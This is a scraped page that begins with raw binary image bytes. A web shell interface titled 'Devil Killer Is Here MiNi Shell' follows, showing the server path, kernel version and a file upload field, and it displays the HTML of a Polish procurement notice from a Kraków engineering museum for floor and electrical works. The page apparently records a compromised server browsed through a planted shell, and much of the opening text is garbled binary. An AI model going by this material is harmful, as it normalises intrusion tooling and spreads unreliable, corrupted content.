JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211202/0029655301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych polegających na dostosowaniu posadzki w hali E do pełnienia funkcji sali wystawienniczej dla ekspozycji stałej w siedzibie Muzeum Inżynierii Miejskiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Inżynierii Miejskiej w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351535611</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Św. Wawrzyńca</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">muzeum@mim.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mim.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych polegających na dostosowaniu posadzki w hali E do pełnienia funkcji sali wystawienniczej dla ekspozycji stałej w siedzibie Muzeum Inżynierii Miejskiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6b296fe0-5366-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00296553</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010965/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Adaptacja hali E na potrzeby wystawy stałej w zakresie instalacji elektrycznej, teletechnicznej i naprawy podłogi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.krakow.pl/?bip_id=316&amp;mmi=11058 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.bip.krakow.pl/?<br/>bip_id=316&amp;mmi=11058<br/>Miniportal UZP: https://miniportal.uzp.gov.pl/,<br/>ePUAP: https://obywatel.gov.pl/nforms/ezamowienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>niniejszym postępowaniu komunikacja odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://obywatel.gov.pl/nforms/ezamowienia oraz poczty<br/>elektronicznej na adres: muzeum@mim.krakow.pl<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto na ePUAP.<br/>3. Wykonawca składa tylko jedną ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania<br/>oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Wraz z<br/>formularzem należy złożyć pozostałe dokumenty wskazane w pkt 6.1.1. – 6.1.5. SWZ.<br/>UWAGA!<br/>Uwaga! Wykonawca winien zapoznać się z wytycznymi Urzędu Zamówień Publicznych<br/>udostępnionymi na https://www.uzp.gov.pl/strona-glowna/slider-aktualnosci/jak-nalezy-podpisacofertewpostaci-<br/>elektronicznej/jak-nalezy-podpisac-oferte-w postaci-elektronicznej Zgodnie z ww.<br/>wytycznymi podpis składany wyłącznie na ww. „Formularzu do złożenia, zmiany, wycofania oferty lub<br/>wniosku” nie wywołuje skutków w odniesieniu do złożonej za jego pomocą oferty Wykonawcy. Oferta<br/>bowiem, zgodnie z art. 63 ustawy, a nie ww. formularz elektroniczny za pośrednictwem którego jest<br/>przekazywana, musi zostać opatrzona właściwym podpisem. W zakresie procedury podpisywania<br/>oferty odpowiednim podpisem, czyli składania właściwego podpisu pod ofertą złożoną w postaci<br/>elektronicznej wskazać należy, iż prawidłowym będzie złożenie oferty w ten sposób, że Wykonawca<br/>przekazuje Zamawiającemu zaszyfrowany plik zawierający ofertę opatrzoną właściwym podpisem lub<br/>plik oferty wraz z plikiem podpisu (w przypadku podpisu zewnętrznego), przy czym opatrzenie oferty<br/>podpisem nastąpiło przed zaszyfrowaniem oferty. Dopuszczalne jest również, aby Wykonawca<br/>przekazał Zamawiającemu swoją ofertę w tzw. „paczce” dokumentów elektronicznych (tj. w skompresowanym archiwum dokumentów elektronicznych, które najczęściej zapisane jest w formacie<br/>ZIP) wraz z właściwym podpisem dołączonym jako plik podpisu do paczki dokumentów<br/>elektronicznych przed jej zaszyfrowaniem, o czym wprost stanowi § 8 Rozporządzenia, o którym mowa<br/>w pkt 8.4. SWZ. Zatem podpis może zostać złożony bezpośrednio na pliku z ofertą Wykonawcy lub na<br/>„paczce” dokumentów elektronicznych zawierających ofertę Wykonawcy. Opatrzenie właściwym<br/>podpisem oferty (lub paczki) następuje przed czynnością jej zaszyfrowania. Złożenie podpisu jedynie<br/>na „Formularzu do złożenia, zmiany, wycofania oferty lub wniosku” nie jest równoznaczne ze<br/>złożeniem podpisu pod ofertą. Oferta, która została złożona bez opatrzenia właściwym podpisem<br/>elektronicznym podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 3 ustawy z uwagi na niezgodność<br/>z art. 63 ustawy.<br/>4. Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w „Instrukcji użytkownika<br/>systemu miniPortal oraz Regualminie ePUAP”.<br/>5. Identyfikator postępowania został wskazany w pkt 2. SWZ.<br/>6. W Formularzu Oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP oraz poczty<br/>elektronicznej poprzez które Zamawiający będzie komunikował się z Wykonawcą.<br/>7. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za pośrednictwem<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku”. Sposób wycofania oferty został<br/>opisany w „Instrukcji użytkownika systemu miniPortal-ePUAP”.<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów, informacji i oświadczeń<br/>oraz ich cyfrowych odwzorowań (w tym tzw. kopii elektronicznych) opisane zostały w Regulaminie<br/>korzystania z miniPortalu oraz Regulaminie ePUAP<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>„złożenia, zmiany, wycofania oferty lub wniosku” oraz „komunikacji” wynosi 150 MB, a plików<br/>przesyłanych za pośrednictwem poczty elektronicznej wynosi 40 MB.<br/>c.d. w Informacjach dodatkowych i w pkt 9 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1) dalej „RODO” informujemy, że:<br/>• administratorem danych osobowych przekazanych przez Wykonawcę jest:<br/>1) Zamawiający – Muzeum Inżynierii Miejskiej w Krakowie, z siedzibą ul. Św. Wawrzyńca 15, 31-060<br/>Kraków tel: 12 428 66 00 e-mail w sprawie danych osobowych: iod@mimk.com.pl;<br/>• przetwarzanie danych osobowych przez Zamawiającego jest niezbędne dla celów wynikających z<br/>prawnie uzasadnionych interesów realizowanych przez Zamawiającego i wypełnienia obowiązku<br/>prawnego ciążącego na administratorze;,<br/>• podstawa prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. b i c RODO w celu związanym<br/>z postępowaniem przetargowym prowadzonym w trybie przetargu nieograniczonego na podstawie art.<br/>39 i następne ustawy Pzp,<br/>• dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym, a także podmiotom<br/>przetwarzającym dane na podstawie zawartych umów,<br/>• dane osobowe Oferenta będą przechowywane przez okres obowiązywania umowy a następnie 5 lat,<br/>od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu obowiązywania umowy.<br/>Okresy te dotyczą również Oferentów, którzy złożyli oferty i nie zostały one uznane, jako<br/>najkorzystniejsze,<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO,<br/>• osobie, której dane dotyczą przysługuje:<br/>1) na podstawie art. 15 RODO prawo dostępu do jej danych osobowych,<br/>2) na podstawie art. 16 RODO prawo do sprostowania jej danych osobowych,<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, (Biuro Generalnego<br/>Urzędu Ochrony Danych Osobowych, ul Stawki 2, 00-193 Warszawa);<br/>• osobie, której dane dotyczą nie przysługuje:<br/>1) w związku z art. 17 ust. 3 lit. b lub d lub e RODO prawo do usunięcia danych osobowych,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>24.2 Wykonawcy zobowiązani są do dochowania obowiązku informacyjnego, o którym mowa w art. 13 i<br/>14 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE w stosunku do osób,<br/>których dane osobowe przekazał w związku z udziałem w postepowaniu<br/>przetargowym</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOT.26.38.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na dostosowaniu posadzki w hali E do pełnienia funkcji sali wystawienniczej dla ekspozycji stałej oraz wykonanie instalacji elektrycznej. Hala E wchodzi w kompleks budynków znajdujących się przy ul. św. Wawrzyńca 15 w Krakowie.<br/>3.2.	Opis stanu istniejącego:<br/>3.2.1.	Wierzchnia warstwa posadzki to lita powłoka przypominająca farbę do pokrywania nawierzchni betonowych lub jedną warstwę cienkowarstwowej posadzki epoksydowej. Widoczne podziały prostopadłe do dłuższych boków hali (oddzielania dylatacyjne pól lub kolejne pola prac).<br/>3.2.2.	W dokumentacji projektowej określono zakres koniecznych przerw dylatacyjnych - dylatacje &#34;od ścian oraz w osiach - podłużnych i poprzecznych słupów<br/>3.2.3.	w środkowych. Wykonać 2 szczeliny przeciwskurczowe w każdym polu&#34;. Widoczne są podziały, ich charakter zostanie ostatecznie ujawniony po usunięciu wierzchniej warstwy posadzki.<br/>3.2.4.	Stan faktyczny przekrycia kanałów - deski oparte na dwóch biegnących równolegle kątownikach.<br/>3.3.	Zakres prac:<br/>3.3.1.	Usunięcie (poprzez zdarcie - szlifowanie) istniejącej powłoki cienkowarstwowej i wykonanie nowej instalacji elektrycznej (zgodnie z przygotowaną dokumentacją) wraz z usunięciem starej instalacji elektrycznej (niepotrzebne elementy starego zasilania widoczne na powierzchni posadzki). Prace należy rozpocząć od usunięcia (poprzez zdarcie - szlifowanie) istniejącej powłoki cienkowarstwowej. Wykonanie tej czynności pozwoli prawidłowo i ostatecznie ocenić stan podłoża (wylewki), rozmieszczenie przerw dylatacyjnych i stwierdzić ostatecznie czy i jaki jest zakres koniecznych prac naprawczych. Po wstępnym oczyszczeniu podłoża należy wykonać nową instalację zasilania w energię elektryczną. Rozprowadzenie instalacji planowane jest w bruzdach wyciętych <br/>w istniejącej wylewce. Bruzdy instalacyjne o szerokości ok. 150mm zostaną wycięte zgodnie z rozplanowaniem przedstawionym w przygotowanej dokumentacji projektowej branży elektrycznej.<br/>3.3.2.	Naprawy, uzupełnienia, wzmocnienie jednolitości i wyrównanie podłoża, czyli przygotowanie istniejącego podłoża do połączenia z nowymi warstwami posadzki. Konieczna będzie kontrola rozmieszczenia przerw dylatacyjnych <br/>i uzupełnienia lub naprawy na powierzchni równej 10-15% powierzchni całkowitej hali (wypełnienia bruzd nowej instalacji zasilania elektrycznego, odspojenia, pęknięcia i ubytki ujawnione po zdarciu wierzchniej warstwy starej posadzki). Całość bruzd, braków i ubytków po wykonaniu warstwy łączącej (gruntowanie) wypełnić masą do reperacji (na bazie cementu) i wzmocnić <br/>w miejscach szczególnie narażonych na oddzielenie (pękanie) dwoma warstwami siatki z włókna szklanego. Na tak przygotowanym, uzupełnionym podłożu należy po powtórnym zagruntowaniu całości wykonać cienkowarstwową samopoziomującą wylewkę o składzie zapewniającym połączenie z istniejącym podłożem.<br/>3.3.3.	Wykonanie nowej nawierzchni i nowych pokryć kanałów instalacyjnych. Posadzka wg klasyfikacji posadzek żywicznych na podstawie zaleceń FeRFA (The Resin Floor Association) i BS 8204-6 zaleca się wykonanie posadzki epoksydowo-poliuretanowej sklasyfikowanej w tabeli klasyfikacji posadzek w poz. 4 lub 5, są to posadzki wielowarstwowe, malowane lub wylewane z warstwami z posypki <br/>a kruszyw między warstwami żywicy - o grubości posadzki powyżej 2mm (max. 4mm). Zgodnie z tabelą klasyfikacji posadzek, nawierzchnia ma zapewnić łatwość utrzymania, być antypoślizgowa, posiadać dobrą odporność na ścieranie, obciążenia udarowe i krótkotrwałe zanieczyszczenia chemikaliami. Użytkowanie w przedziale od -5 do + 40 st. C. Warstwa dolna - żywica epoksydowa modyfikowana komponentem poliuretanowym - zapewnia dużą elastyczność, warstwa wierzchnia w postaci modyfikowanego utwardzacza zapewnia odporność na ścieranie.<br/>W zakresie antypoślizgowości (brak polskich norm) wykorzystując przepisy niemieckie zaleca się uzyskanie wskaźnika (kąt poślizgu) oznaczonego wg DIN51130 jako R11, a wg DIN51097 jako B lub C, o kącie poślizgu w przedziale 19-27 stopni. Dopuszcza sie zastosowanie posadzki oznaczonej wg DIN51130 jako R10, a wg DIN51097 jako A lub B, o kącie poślizgu w przedziale 10 - 19 stopni.<br/>Posadzka powinna składać się z następujących warstw:<br/>- kompozycji gruntującej,<br/>- posypki z piasku kwarcowego,<br/>- kompozycji podstawowej,<br/>- posypki kwarcowej lub korundowej,<br/>- powłoki zamykającej.<br/>Ponieważ gruntowanie umieszczono w czynnościach przygotowawczych należy zwrócić uwagę na konieczność doboru gruntu zgodnego <br/>z podstawowymi warstwami posadzki.<br/>Przykładowa technologia wykonania posadzki zakłada następujące czynności:<br/>- przygotowanie podłoża (szlifowanie, frezowanie lub piaskowanie),<br/>- nałożenie żywicy gruntującej,<br/>- posypanie piaskiem kwarcowym,<br/>- usunięcie niezwiązanego, luźnego piasku kwarcowego,<br/>- nałożenie wodoszczelnej zaprawy żywicznej z ręcznym lub mechanicznym zatarciem,<br/>- nałożenie wałkiem warstwy żywicy,<br/>- posypanie piaskiem kwarcowym (lub korundowym) z nadmiarem,<br/>- usunięcie niezwiązanego, luźnego piasku kwarcowego,<br/>- zamknięcie powierzchni przez nałożenie warstwy barwnej żywicy.<br/><br/>Elementem dopełniającym część posadzki są pokrywy zamykające kanał instalacyjny. Zaleca się zastąpienie istniejącego wypełnienia z desek pokrytych farbą panelami o konstrukcji stalowej wypełnionej dwoma warstwami płyty OSB z powierzchniowym wykończeniem warstwami posadzki epoksydowo-poliuretanowej (identycznej jak w pozostałej części hali). Sposób wykonania <br/>i detale na załączonych rysunkach. Rysunki pokazują podstawowy element wypełnienia. Biorąc pod uwagę przebieg kanałów i możliwe zmiany wymiarów - przed przystąpieniem do prac należy wykonać szczegółowy pomiar dla każdego odcinka kanału. Lokalizację paneli z uchwytami umożliwiającymi podniesienie pokryw należy dostosować do aranżacji wystawy stałej. <br/><br/>3.3.4.	Instalacja elektryczna<br/>Instalację elektryczną należy wykonać zgodnie z projektem wykonawczym pt: „Projekt instalacji elektrycznej w hali E, oraz systemu sterowania oświetleniem DALI do zamontowanego w budynkach D, E, L i H przy ul. św. Wawrzyńca 15 <br/>w Krakowie oświetlenia roboczego i oświetlenia wystawy stałej” w zakresie obejmującym jedynie halę E. Z zakresu prac, opisanych w pkt 2.5 „Budynek E. Zasilanie w energię elektryczną” i 2.6 „Budynek E. Instalacje oświetlenia i gniazd wtykowych” opisu technicznego oraz przedmiaru zostają wyłączone elementy sterujące systemy DALI (routery i pulpity sterujące). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45247270-3 - Budowa zbiorników</p> <p class="mb-0">45262330-3 - Roboty w zakresie naprawy betonu</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45432112-2 - Kładzenie nawierzchni</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów:<br/>1) cena – waga 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy – zgodnie z art. 57 pkt 2 ustawy – spełniają warunki udziału w postępowaniu, tj. w zakresie posiadania zdolności technicznej lub zawodowej, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał co najmniej jedną robotę budowlaną obejmującą roboty elektryczne oraz wykonanie podłogi 